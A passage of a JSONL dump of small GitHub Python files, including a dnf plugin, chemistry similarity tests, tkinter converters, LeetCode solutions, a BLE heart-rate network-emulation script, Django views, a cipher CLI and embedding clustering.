logger.debug('Usrkeeper plugin: %s', msg)\n\n def resolved(self):\n self._out('pre transaction commit')\n command = '%s %s' % ('usrkeeper', \" pre-install\")\n ret = os.system(command)\n if ret != 0:\n raise dnf.exceptions.Error('usrkeeper returned %d' % (ret >> 8))\n\n def transaction(self):\n self._out('post transaction commit')\n command = '%s %s > /dev/null' % ('usrkeeper', \"post-install\")\n os.system(command)\n\nif __name__ == \"__main__\":\n from distutils.core import setup\n setup(name=\"dnf-usrkeeper\",\n packages=[\"dnf-plugins\"],\n package_dir={\"dnf-plugins\":\"usrkeeper-dnf\"})\n","repo_name":"strugee/usrkeeper","sub_path":"usrkeeper-dnf/usrkeeper.py","file_name":"usrkeeper.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18295110962","text":"import os\nimport sys\nfrom itertools import islice, product\n\nsys.path.append(\n os.path.normpath(\n os.path.join(os.path.abspath(__file__), \"..\", \"..\", \"..\", \"common\")\n )\n)\nfrom env_indigo import * # noqa\n\nindigo = Indigo()\nindigo.setOption(\"ignore-stereochemistry-errors\", \"1\")\nindigo.setOption(\"ignore-noncritical-query-features\", \"true\")\nindigo.setOption(\"similarity-type\", \"CHEM\")\n\nprint(\"*** Difference between CHEM and Normilized-Edit ***\")\n\nsmiles_file_path = joinPathPy(\"molecules/pubchem_slice_100k.smiles\", __file__)\nnum_control_mols = 10\nnum_mols = 10000\n\n# the max accepted difference between `norm` and `chem`\nsimilarity_threshold = 0.20\nzero_similarity_threshold = 0.35\nalarm_similarity_threshold = 0.40\n\nall_mols = (m for m in indigo.iterateSmilesFile(smiles_file_path))\ncontrol_mols = islice(all_mols, num_control_mols)\nmols = islice(all_mols, num_mols)\n\ncheck_counter = 0\nproblems_counter = 0\nzero_problems_counter = 0\nalarm_problems_counter = 0\n\nworst_problem_difference = 0\nworst_problem_data = (None, None, 0.0, 0.0)\n\nfor m1, m2 in product(control_mols, mols):\n f1 = m1.fingerprint(\"sim\")\n f2 = m2.fingerprint(\"sim\")\n\n norm = indigo.similarity(m1, m2, \"normalized-edit\")\n chem = indigo.similarity(f1, f2, \"tversky 0.7 0.7\")\n diff = abs(norm - chem)\n\n check_counter += 1\n\n if diff > similarity_threshold:\n problems_counter += 1\n\n if diff > zero_similarity_threshold:\n zero_problems_counter += 1\n\n if diff > alarm_similarity_threshold:\n alarm_problems_counter += 1\n\n if diff > worst_problem_difference:\n worst_problem_difference = diff\n worst_problem_data = (m1, m2, norm, chem)\n\n\nprint(\" Molecule group size: %d\" % num_mols)\nprint(\" Control group size: %d\" % num_control_mols)\nprint(\" Number of pairs: %d\" % check_counter)\n\nDEBUG = False # turn off for reproducible results\nif DEBUG:\n print(\n \" Out of %d pairs %d pairs were above the similarity threshold %f, which is %d%%\"\n % (\n check_counter,\n problems_counter,\n similarity_threshold,\n round(100.0 * problems_counter / check_counter),\n )\n )\n print(\n \" Out of %d pairs %d pairs were above the zero similarity threshold %f, which is %d%%\"\n % (\n check_counter,\n zero_problems_counter,\n zero_similarity_threshold,\n round(100.0 * zero_problems_counter / check_counter),\n )\n )\n print(\n \" %d pairs were above the alarm similarity threshold %f, which is %d%%\"\n % (\n alarm_problems_counter,\n alarm_similarity_threshold,\n round(100.0 * alarm_problems_counter / check_counter),\n )\n )\n\nall_is_fine_flag = True\n\nif 1.0 * alarm_problems_counter / check_counter > 0.0001:\n all_is_fine_flag = False\n (m1, m2, norm, chem) = worst_problem_data\n print(\" ALARM!\\n\")\n print(\n \" Too many pairs (%d) were above the alarm problem threshold %f\\n\"\n % (alarm_problems_counter, alarm_similarity_threshold)\n )\n print(\" mol1: %s\\n\" % (m1.canonicalSmiles()))\n print(\" mol2: %s\\n\" % (m2.canonicalSmiles()))\n print(\" normalized-edit sim: %f, chem sim: %f\\n\" % (norm, chem))\n print(\n \" The difference %f is bigger than the alarm threshold %f\\n\"\n % (worst_problem_difference, alarm_similarity_threshold)\n )\n\nif 1.0 * zero_problems_counter / check_counter > 0.001:\n all_is_fine_flag = False\n print(\" ALARM!\\n\")\n print(\n \" Too many pairs (%d) were above the zero problem threshold %f\\n\"\n % (zero_problems_counter, zero_similarity_threshold)\n )\n\nif 1.0 * problems_counter / check_counter > 0.25:\n all_is_fine_flag = False\n print(\" ALARM!\\n\")\n print(\n \" Too many pairs (%d) were above the problem threshold %f\\n\"\n % (problems_counter, similarity_threshold)\n )\n\nif all_is_fine_flag:\n print(\" All seems to be fine\")\n","repo_name":"epam/Indigo","sub_path":"api/tests/integration/tests/similarity/chem-vs-normalized-edit.py","file_name":"chem-vs-normalized-edit.py","file_ext":"py","file_size_in_byte":3984,"program_lang":"python","lang":"en","doc_type":"code","stars":257,"dataset":"github-code","pt":"53"} +{"seq_id":"35013654600","text":"from tkinter import *\n\ndef convert():\n kg = entry_kg.get()\n # 1 kg = 1000 gram\n label_result_gram[\"text\"] = f\"{round(float(kg)*1000, 4)}\"\n\n # 1 kg = 2.20462262 pound\n label_result_pounds[\"text\"] = f\"{round(float(kg)*2.20462262, 4)}\"\n\n # 1 kg = 35.2739619 ounce\n label_result_ounce[\"text\"] = f\"{round(float(kg)*35.2739619, 4)}\"\n\nif __name__ == '__main__':\n display = Tk()\n\n # create frame kg\n frame_kg = Frame(display)\n label_kg = Label(frame_kg, text = \"Enter the weight in Kg\")\n entry_kg = Entry(frame_kg, width = 20)\n\n label_kg.grid(row=0, column=0)\n entry_kg.grid(row=0, column=1)\n\n # Create button convert\n button_convert = Button(display, text = \"Convert\", command = convert)\n \n # Create frame gram\n frame_gram = Frame(display)\n label_gram = Label(frame_gram, text = \"Gram\")\n label_result_gram = Label(frame_gram, text = \"0\")\n \n label_gram.grid(row=0, column=0, sticky=\"E\")\n label_result_gram.grid(row=0, column=1, sticky=\"W\")\n \n # Create frame pounds\n frame_pounds = Frame(display)\n label_pounds = Label(frame_pounds, text = \"Pounds\")\n label_result_pounds = Label(frame_pounds, text = \"0\")\n \n label_pounds.grid(row=0, column=0, sticky=\"E\")\n label_result_pounds.grid(row=0, column=1, sticky=\"W\")\n \n # Create frame ounce\n frame_ounce = Frame(display)\n label_ounce = Label(frame_ounce, text = \"Ounce\")\n label_result_ounce = Label(frame_ounce, text = \"0\")\n \n label_ounce.grid(row=0, column=0, sticky=\"E\")\n label_result_ounce.grid(row=0, column=1, sticky=\"W\")\n\n # display\n frame_kg.grid(row=0, column=0, padx=10)\n button_convert.grid(row=0, column=1)\n frame_gram.grid(row=1, column=0)\n frame_pounds.grid(row=2, column=0)\n frame_ounce.grid(row=3, column=0)\n \n display.mainloop()","repo_name":"DuyNguyen555/Codegyms","sub_path":"python_basic/12.library_tkinter/weight_conversion.py","file_name":"weight_conversion.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26721657012","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeElements(self, head: Optional[ListNode], val: int) -> Optional[ListNode]:\n dummy = ListNode(-1, head)\n left = dummy\n while head:\n if head.val != val:\n left = head\n else:\n left.next = head.next\n head = head.next\n return dummy.next","repo_name":"Bigdreamer17/LeetCode","sub_path":"0203-remove-linked-list-elements/0203-remove-linked-list-elements.py","file_name":"0203-remove-linked-list-elements.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35450548301","text":"# -*- coding: utf-8 -*-\n# 心拍数、電圧を取得してBLEでアドバタイズ(ブロードキャスト)\n# M5StickCは4秒:アドバタイズ、1秒:Deep Sleep\n# ラズパイ側は常時スキャンし、データーを取得したらprintする\n\nfrom bluepy.btle import DefaultDelegate, Scanner, BTLEException\nimport sys\nimport struct\nfrom datetime import datetime\nimport subprocess\n\n# T_PERIOD = 4\n\n\nclass ScanDelegate(DefaultDelegate):\n def __init__(self): # コンストラクタ\n DefaultDelegate.__init__(self)\n self.lastseq = None\n self.lasttime = datetime.fromtimestamp(0)\n print(\"init\")\n\n def handleDiscovery(self, dev, isNewDev, isNewData):\n if isNewDev or isNewData: # 新しいデバイスまたは新しいデータ\n for (adtype, desc, value) in dev.getScanData(): # データの数だけデータスキャンを繰り返す\n # 'ffff' = テスト用companyID\n # M5stickCからのデータを見つけたら\n if desc == 'Manufacturer' and value[0:4] == 'ffff':\n __delta = datetime.now() - self.lasttime # 前回取得時刻からの差分をとる\n # アドバタイズする1秒(デフォルト:10秒)の間に複数回測定されseqが加算されたものは捨てる(最初に取得された1個のみを使用する)\n # default seconds = 11\n if value[4:6] != self.lastseq and __delta.total_seconds() > 5:\n self.lastseq = value[4:6] # Seqと時刻を保存 時刻はどこにあるんだ\n self.lasttime = datetime.now()\n # (temp, humid, press, volt) = struct.unpack(' 80:\n # ここに直接数値を埋め込めるか?予め文字列に入れるか?\n loss_netem = (bpm - 80) * 4\n if loss_netem > 70:\n loss_netem = 70\n # delay_netem = bpm - 75 # 遅延量(100bpmで100ms)\n # jitter_netem = int((bpm - 75) / 2) # 遅延量のゆらぎ(±)\n # changeなので指定した値に変更される。累積はされない\n # cmd_netem = \"sudo tc qdisc change dev eth0 root netem delay \" + \\\n # str(delay_netem) + \"ms\"\n # + \\\n # str(jitter_netem) + \"ms\"\n cmd_netem = \"sudo tc qdisc change dev eth0 root netem loss \" + \\\n str(loss_netem) + \"%\" + \" delay \" + str(loss_netem)\n # subprocess.runが動いている間はスキャンできないのでは?\n subprocess.run(\n cmd_netem, shell=True)\n print(\"loss: \" + str(loss_netem) + \"%\")\n else:\n # subprocess.run(\n # ['sudo tc qdisc change dev eth0 root netem delay 0ms'], shell=True)\n subprocess.run(\n ['sudo tc qdisc change dev eth0 root netem loss 0%'], shell=True)\n\n\n# if __name__ == \"__main__\":\n\n# 有線'eth0'から出ていく��ケットにネットワークエミュレーションを追加\n# そもそもこのプログラム自体sudoで動かしているので処理中にsudo passを求められることはないはず\n# tc = traffic control\nsubprocess.run([\"sudo tc qdisc add dev eth0 root netem\"], shell=True)\n\nscanner = Scanner().withDelegate(ScanDelegate())\ntry:\n while True:\n # try:\n # スキャンする。デバイスを見つけた後の処理はScanDelegateに任せる\n print(\"scan\")\n scanner.scan(5.0) # 5秒間スキャンする(この間他の処理は止まる)\n# except BTLEException:\n # ex, ms, tb = sys.exc_info()\n # print('BLE exception '+str(type(ms)) +\n # ' at ' + sys._getframe().f_code.co_name)\n # subprocess.run([\"sudo tc qdisc del dev eth0 root\"], shell=True)\nexcept KeyboardInterrupt as e:\n # ネットワークエミュレータの削除\n # ここで遅延を元に戻してから終了する\n # subprocess.run([\"sudo tc qdisc del dev eth0 root\"], shell=True)\n print(\"Aborted!\")\n # pass\nfinally:\n subprocess.run([\"sudo tc qdisc del dev eth0 root\"], shell=True)\n","repo_name":"p3ishnm2/HeartBeat_Packet","sub_path":"Access_Point/bridge.py","file_name":"bridge.py","file_ext":"py","file_size_in_byte":5102,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14998658592","text":"from typing import List\n\nfrom numpy import sort\n\n\nclass ev_2021_06_24_no_149:\n def maxPoints(self, points: List[List[int]]) -> int:\n allPointSize = len(points)\n PointMaxNumberContainer = [0]*allPointSize\n for i in range(0, allPointSize -1):\n pointKNumberContainer = [0]*(allPointSize -1)\n pointA = points[i]\n skip = False\n for j in range(0, allPointSize - 1):\n if(j == i):\n skip = True\n continue\n pointB = points[j]\n if(pointB[0] == pointA[0]):\n k = True\n else:\n k = (pointB[1] - pointA[1])/(pointB[0] - pointA[0])\n if(skip):\n pointKNumberContainer[j-1] = k\n else:\n pointKNumberContainer[j] =k\n sort(pointKNumberContainer)\n\n\n\n\n return 1\n\n\n\n\n\n\nif __name__ == \"__main__\":\n input = [[1, 1], [2, 2], [3, 3]]\n a = ev_2021_06_24_no_149()\n t = [1, True, 3]\n print(t)\n print(a.maxPoints(input))\n print((3-1)/(4-1))\n","repo_name":"mikilangkilo/leetcode","sub_path":"src/everyday/ev_2021_06_24_no_149.py","file_name":"ev_2021_06_24_no_149.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983169987","text":"# 정수 N이 입력되면 00시 00분 00초부터 N시 59분 59초까지의 모든 시각 중에서 3이 하나라도 포함되는 \n# 모든 경우의 수를 구하는 프로그램을 작성하시오.\n# 예를 들어 1을 입력했을 때 다음은 3이 하나라도 포함되어 있으므로 세어야하는 시각입니다.\n# 00시 00분 03초, 00시 13분 30초\n# 반면에 다음은 3이 하나도 포함되어 있지 않으므로 세면 안되는 시각입니다.\n# 00시 02분 55초, 01시 27분 45초\n\n# 00~23시 00~59분 00~59초 까지 존재한다.\n\ntarget_hour = int(input())\n\ncount = 0\n\nfor hour in range(target_hour+1):\n for minute in range(60):\n for second in range(60):\n if \"3\" in str(hour) or \"3\" in str(minute) or \"3\" in str(second):\n count += 1\n\nprint(count)","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/implementation/implementation-01.py","file_name":"implementation-01.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9989415913","text":"## TP-1 Zcasino ##\n### Le joueur mise un numéro entre 0 et 49 ###\n#### Il dépose la mise souhaitée ####\n##### Les numéros pairs sont noirs, les impairs rouges #####\n###### Le croupier fait tourner la roulette et la bille s'arrête sur ######\n###### le numéro gagnant. ######\n####### Si le numéro est le même que celui du joueur alors : #######\n# Le joueur remporte sa mise + 3 fois sa mise #\n## Si la couleur est la même alors : ## \n### Le joueur remporte sa mise + 50% de sa mise. ###\n#### Si le numéro et la couleur diffèrent alors : ####\n##### Le joueur perd sa mise. #####\nimport random\n\ncash = 1000\nprint (\"Votre montant de départ est de\", cash, '$')\n \ncontinuer_partie = True\nwhile continuer_partie:\n# Le joueur choisi le numéro sur lequel il effectuera une mise #\n \n numero = input('Choisissez un numéro situé entre 0 et 49:')\n while int(numero) <= 0 or int(numero) >= 50:\n numero = input('Choisissez un numéro situé entre 0 et 49:')\n if int(numero) % 2 == 0:\n print ('Vous misez sur le', numero, 'noir')\n else:\n print ('Vous misez sur le', numero, 'rouge')\n \n # Le joueur détermine maintenant sa mise #\n \n mise_joueur = input ('Quelle sommes souhaitez-vous miser ?')\n while int(mise_joueur) > int(cash):\n print('Fond non disponible')\n mise_joueur = input('Quelle sommes souhaitez-vous miser ?')\n else :\n print('mise de', mise_joueur, '$')\n \n# Les jeux sont faits, rien ne va plus #\n \n print('Les jeux sont faits, rien ne va plus!')\n \n# Le croupier fait tourner la roulette et le résultat est annoncé #\n \n num_gagnant = random.randint(1,49)\n if num_gagnant % 2 == 0:\n print('Le numéro gagnant est', num_gagnant, 'noir')\n else:\n print('Le numéro gagnant est', num_gagnant, 'rouge')\n \n# Le croupier compare maintenant le numéro gagnant avec celui du joueur #\n \n# Les numéros sont identiques #\n \n if int(numero) == int(num_gagnant):\n cash = cash + (3 * int(mise_joueur))\n print('Bravo! Vous remportez 3 fois votre mise')\n print ('Votre capital est maintenant de', cash, '$')\n \n# Les numéros sont de couleurs noirs #\n \n elif int(numero) % 2 == 0 and int(num_gagnant) % 2 == 0:\n cash = int(cash) + (0.5 * int(mise_joueur))\n print('Pas mal! Vous remportez 50% de votre mise')\n print('Votre capital est maintenant de', cash, '$')\n \n# Les numéros sont de couleurs rouges #\n \n elif int(numero) % 2 != 0 and int(num_gagnant) % 2 != 0:\n cash = int(cash) + (0.5 * int(mise_joueur))\n print('Pas mal! Vous remportez 50% de votre mise')\n print('Votre capital est maintenant de', cash, '$')\n \n# Les numéros sont tout à fait différents #\n \n else:\n cash = int(cash) - int(mise_joueur)\n print('Vous venez de perdre votre mise')\n print('Votre capital est maintenant de', cash, '$')\n \n# Le joueur n'a plus d'argent #\n \n if cash <= 0:\n print( 'Vous voilà sans un sous, prière de quitter la table SVP')\n continuer_partie = False\n \n# Le joueur désire-t-il continuer la partie #\n \n quitter = input('Souhaitez-vous quitter la table de jeu? (O/N)')\n if quitter == 'O' or quitter == 'o':\n print('À bientot!')\n continuer = False\n break","repo_name":"i3652/Zcasino","sub_path":"ZCasinoo.py","file_name":"ZCasinoo.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11342598892","text":"import traceback\n\nfrom django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.db.models import Count\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\nfrom listArch.models import ListProduct, Product, ProductDesc, Customer, Company\nfrom listArch.models.List import List\nfrom listArch.services import general_methods\n\n\ndef addList(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('listArch:kullanici-giris-yap')\n\n try:\n\n if request.method == 'POST':\n list = List(list_name=request.POST['list_name'], user=request.user, type=request.POST['list_type'],\n description=request.POST['description'])\n list.save()\n\n reference_list = request.POST['reference_list']\n if reference_list != 'Yok' and reference_list != 'Bağlantılı Liste':\n list.reference_list = List.objects.get(list_name=reference_list)\n list.save()\n\n product_id = request.POST['product']\n product = Product.objects.get(pk=product_id)\n\n product_list = ListProduct(list=list, product=product)\n product_list.save()\n\n messages.success(request, \"Listenize ürün eklendi\")\n return redirect('listArch:kullanici-listeleri')\n\n\n except Exception as e:\n print(e)\n return redirect('listArch:404-sayfasi')\n return redirect('listArch:kullanici-listeleri')\n\n\ndef delete_list(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('listArch:kullanici-giris-yap')\n if request.POST:\n try:\n\n list_id = request.POST['list_id']\n list = List.objects.get(pk=list_id)\n list.delete()\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef list_detail(request, pk):\n try:\n user = request.user\n customer = Customer.objects.get(user=user)\n user_list = List.objects.filter(user=user)\n list = List.objects.get(pk=pk)\n list_product = ListProduct.objects.filter(list=list)\n return render(request, 'User/list-detail.html',\n {'list_product': list_product, 'list': list, 'customer': customer, 'user_list': user_list})\n except Exception as e:\n traceback.print_exc()\n\n return redirect('listArch:404-sayfasi')\n\n\ndef print_list_page(request, pk):\n user = request.user\n customer = Customer.objects.get(user=user)\n user_list = List.objects.filter(user=user)\n list = List.objects.get(pk=pk)\n list_product = ListProduct.objects.filter(list=list)\n company = Company.objects.filter(user=user)\n return render(request, 'User/list_print_page.html',\n {'list_product': list_product, 'list': list, 'customer': customer, 'user_list': user_list,\n 'company': company[0]})\n\n\ndef add_product_list(request, product_id, list_id):\n try:\n list = List.objects.filter(pk=list_id)\n list_product = ListProduct(list=list[0], product=Product.objects.filter(pk=product_id)[0])\n list_product.save()\n messages.success(request, \"Ürün Listenize Başarıyla Eklendi.\")\n return redirect('listArch:kullanici-listeleri')\n\n except Exception as e:\n\n print(e)\n return redirect('listArch:404-sayfasi')\n\n\ndef remove_product_list(request):\n if request.method == 'POST':\n try:\n list_id = request.POST['list_id']\n product_id = request.POST['product_id']\n list = List.objects.get(pk=list_id)\n list_product = ListProduct.objects.filter(list=list)\n\n for product in list_product:\n if product.product.pk == int(product_id):\n product.delete()\n messages.success(request, \"Ürün Listenizden Çıkarıldı.\")\n return JsonResponse({'status': 'Success', 'messages': 'save successfully'})\n\n except Exception as e:\n\n return JsonResponse({'status': 'Fail', 'msg': e})\n\n\ndef list(request):\n try:\n\n user = request.user\n user_lists = List.objects.filter(user=user)\n list_product = ListProduct.objects.filter(list__user=user).values(\n 'list').annotate(\n count=Count('product'))\n\n array = []\n for list_product in list_product:\n list_dict = dict()\n list_products = ListProduct.objects.filter(list_id=list_product['list'])\n if list_products.count() > 0:\n list_dict['list'] = list_products[0].list\n list_dict['products'] = list_products\n\n array.append(list_dict)\n\n return render(request, 'User/list.html', {'list': array, 'user_lists': user_lists})\n\n except Exception as e:\n print(e)\n return redirect('listArch:404-sayfasi')\n","repo_name":"furkanyalcindag/oxit-listingArch","sub_path":"listArch/Views/ListViews.py","file_name":"ListViews.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17213634124","text":"class Solution:\n def gridIllumination(self, N: int, lamps: List[List[int]], queries: List[List[int]]) -> List[int]:\n if len(lamps) == 0:\n return [0 for _ in queries]\n lamp_map = {}\n col = {}\n row = {}\n lD = {}\n rD = {}\n \n for lamp in lamps:\n lamp_map[(lamp[0], lamp[1])] = True\n if lamp[1] in col:\n col[lamp[1]] += 1\n else:\n col[lamp[1]] = 1\n if lamp[0] in row:\n row[lamp[0]] += 1\n else:\n row[lamp[0]] = 1\n a = lamp[0]+N-1-lamp[1]\n if a in lD:\n lD[a] += 1\n else:\n lD[a] = 1\n b = lamp[0]+lamp[1]\n if b in rD:\n rD[b] += 1\n else:\n rD[b] = 1\n \n ans = [0 for _ in queries]\n for i, query in enumerate(queries):\n a = query[0]+N-1-query[1]\n b = query[0]+query[1]\n if (query[1] in col and col[query[1]] > 0) or (query[0] in row and row[query[0]] > 0) or (a in lD and lD[a] > 0) or (b in rD and rD[b] > 0):\n ans[i] = 1\n else:\n ans[i] = 0\n \n poses = [(query[0], query[1]), (query[0], query[1]-1),(query[0], query[1]+1),(query[0]-1, query[1]),(query[0]+1, query[1]),(query[0]-1, query[1]-1),(query[0]+1, query[1]+1), (query[0]-1, query[1]+1), (query[0]+1, query[1]-1)]\n \n for pos in poses:\n if pos in lamp_map and lamp_map[pos] == True:\n lamp_map[pos] = False\n col[pos[1]] -= 1\n row[pos[0]] -= 1\n lD[pos[0]+N-1-pos[1]] -= 1\n rD[pos[0]+pos[1]] -= 1\n return ans\n \n \n \n ","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/1001_GridIllumination.py","file_name":"1001_GridIllumination.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41686753844","text":"import cv2\n\n\ndef adaptiveThresh(img):\n img = cv2.medianBlur(img, 5)\n ret, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)\n th2 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_MEAN_C,\n cv2.THRESH_BINARY, 11, 2)\n th3 = cv2.adaptiveThreshold(img, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C,\n cv2.THRESH_BINARY, 11, 2)\n titles = ['Original Image', 'Global Thresholding (v = 127)',\n 'Adaptive Mean Thresholding', 'Adaptive Gaussian Thresholding']\n images = [img, th1, th2, th3]\n return zip(images, titles)","repo_name":"marvinirwin/python-opencv-selenium-canvas","sub_path":"adaptive_thresh.py","file_name":"adaptive_thresh.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70095815528","text":"import argparse\nimport json\nimport sys\n \nfrom sources.hack import CaesarHacker\nfrom sources.train import Trainer\nfrom sources.encode import CaesarEncoderAndDecoder, VigenereEncoderAndDecoder, VernamEncoderAndDecoder\n \n\ndef code(args, decrypt):\n if args.cipher == 'caesar':\n encoder = CaesarEncoderAndDecoder(args.key)\n elif args.cipher == 'vigenere':\n encoder = VigenereEncoderAndDecoder(args.key)\n else:\n encoder = VernamEncoderAndDecoder(args.key)\n text = args.input_file.read()\n args.output_file.write(encoder.encode(text, decrypt))\n\n\ndef encode(args):\n code(args, False)\n \n \ndef decode(args):\n code(args, True)\n \n \ndef train(args):\n text = args.text_file.read()\n trainer = Trainer()\n trainer.feed(text)\n args.model_file.write(trainer.get_json_model())\n \n \ndef hack(args):\n try:\n model = json.load(args.model_file)\n except json.JSONDecodeError:\n raise SyntaxError('Model file is not correct')\n hacker = CaesarHacker(model)\n text = args.input_file.read()\n args.output_file.write(hacker.hack(text))\n \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n # parser to encode\n parser_encode = subparsers.add_parser('encode')\n parser_encode.add_argument('--cipher', choices=['caesar', 'vigenere', 'vernam'], required=True)\n parser_encode.add_argument('--key', required=True)\n parser_encode.add_argument('--input-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_encode.add_argument('--output-file', type=argparse.FileType('w'), default=sys.stdout)\n parser_encode.set_defaults(func=encode)\n\n # parser to decode\n parser_decode = subparsers.add_parser('decode')\n parser_decode.add_argument('--cipher', choices=['caesar', 'vigenere', 'vernam'], required=True)\n parser_decode.add_argument('--key', required=True)\n parser_decode.add_argument('--input-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_decode.add_argument('--output-file', type=argparse.FileType('w'), default=sys.stdout)\n parser_decode.set_defaults(func=decode)\n\n # parser to train\n parser_train = subparsers.add_parser('train')\n parser_train.add_argument('--text-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_train.add_argument('--model-file', type=argparse.FileType('w'), required=True)\n parser_train.set_defaults(func=train)\n\n # parser to hack\n parser_hack = subparsers.add_parser('hack')\n parser_hack.add_argument('--input-file', type=argparse.FileType('r'), default=sys.stdin)\n parser_hack.add_argument('--output-file', type=argparse.FileType('w'), default=sys.stdout)\n parser_hack.add_argument('--model-file', type=argparse.FileType('r'), required=True)\n parser_hack.set_defaults(func=hack)\n\n args = parser.parse_args()\n args.func(args)\n\n","repo_name":"imarenf/Encryptor","sub_path":"encryptor.py","file_name":"encryptor.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16800264466","text":"# imports\nimport numpy as np\nimport pandas as pd\nfrom ast import literal_eval\nfrom sklearn.cluster import KMeans\nfrom sklearn.manifold import TSNE\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# load data\ndatafile_path = \"embeddings/SIGMOD/path_sum.csv\"\n\ndf = pd.read_csv(datafile_path)\ndf[\"embedding\"] = df.embedding.apply(literal_eval).apply(\n np.array\n) # convert string to numpy array\nmatrix = np.vstack(df.embedding.values)\nprint(matrix.shape)\n\nn_clusters = 5\n\nkmeans = KMeans(n_clusters=n_clusters, init=\"k-means++\", random_state=42)\nkmeans.fit(matrix)\nlabels = kmeans.labels_\ndf[\"Cluster\"] = labels\n\ndf.groupby(\"Cluster\")\n# df.groupby(\"Cluster\").Score.mean().sort_values()\n\ntsne = TSNE(\n n_components=2, perplexity=15, random_state=42, init=\"random\", learning_rate=200\n)\nvis_dims2 = tsne.fit_transform(matrix)\n\nx = [x for x, y in vis_dims2]\ny = [y for x, y in vis_dims2]\n\nfor category, color in enumerate([\"purple\", \"green\", \"red\", \"blue\"]):\n xs = np.array(x)[df.Cluster == category]\n ys = np.array(y)[df.Cluster == category]\n plt.scatter(xs, ys, color=color, alpha=0.3)\n\n avg_x = xs.mean()\n avg_y = ys.mean()\n\n plt.scatter(avg_x, avg_y, marker=\"x\", color=color, s=100)\nplt.title(\"Clusters identified visualized in language 2d using t-SNE\")\nplt.show()\n","repo_name":"hzwy3c/ConferenceQA","sub_path":"utils/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37404408242","text":"from tkinter import *\nimport datetime\nimport time\nfrom time import strftime\nfrom tkinter import messagebox\nfrom suivant import suivant\n\n#Fenetre principale : \n\n \nglobal fen\nfen = Tk()\n\nfen.title(\"GOPApp\")\nfen.geometry(\"720x500\")\nfen.maxsize(720, 500)\nfen.minsize(720, 500)\nfen.iconbitmap('icone.ico')\n#fen.config(background=\"#41B77F\")\n#Ajouter image :\n\n#define image :\nbg = PhotoImage(file=\"images/image.png\")\nmy_label= Label(fen, image=bg)\nmy_label.place(x=0, y=0, relwidth=1, relheight=1)\n#Ajouter Boutton : \nquitter=Button(fen, text=\"Quitter\",font=(\"Courrier\",20),bg=\"red\", fg='black', command=fen.quit)\nquitter.place(x=200, y=400)\n#test function :\n \n#Ajouter Boutton suivant : S\nsuivant = Button(fen, text=\"Suivant\",font=(\"Courrier\",20),bg=\"blue\", fg='black', command=suivant)\nsuivant.place(x=400, y=400)\n\n#Ajouter un frame : (boite)\nf1 = Frame(fen, bd=1, relief=SUNKEN)\n#Ajouter texte :\nlabel_title=Label(f1, text=\"Bienvenue sur GOPApp\", font=(\"Courrier\",25))\nlabel_title.pack(expand=YES)\n#ajouter autre texte : \nlabel_subtitle=Label(f1, text=\"Une application qui vous garantit une meilleur prédiction\", font=(\"Courrier\",20))\nlabel_subtitle.pack(expand=YES)\nf1.pack(expand=YES) \nfen.mainloop()\n","repo_name":"ChaikhiBelaid/GOPApp","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22566228362","text":"from rich import print\n\n\ndef get_input():\n input = []\n with open(\"input.txt\") as input_txt:\n for line in input_txt:\n input.append(line.strip())\n return input\n\n\ndef part_1(input):\n bit_count = [0] * len(input[0])\n for binary_string in input:\n for i, one_or_zero in enumerate(binary_string):\n bit_count[i] += int(one_or_zero)\n\n gamma_string = \"\"\n epsilon_string = \"\"\n for bit in bit_count:\n if bit > (len(input) / 2):\n gamma_string = gamma_string + \"1\"\n epsilon_string = epsilon_string + \"0\"\n else:\n gamma_string = gamma_string + 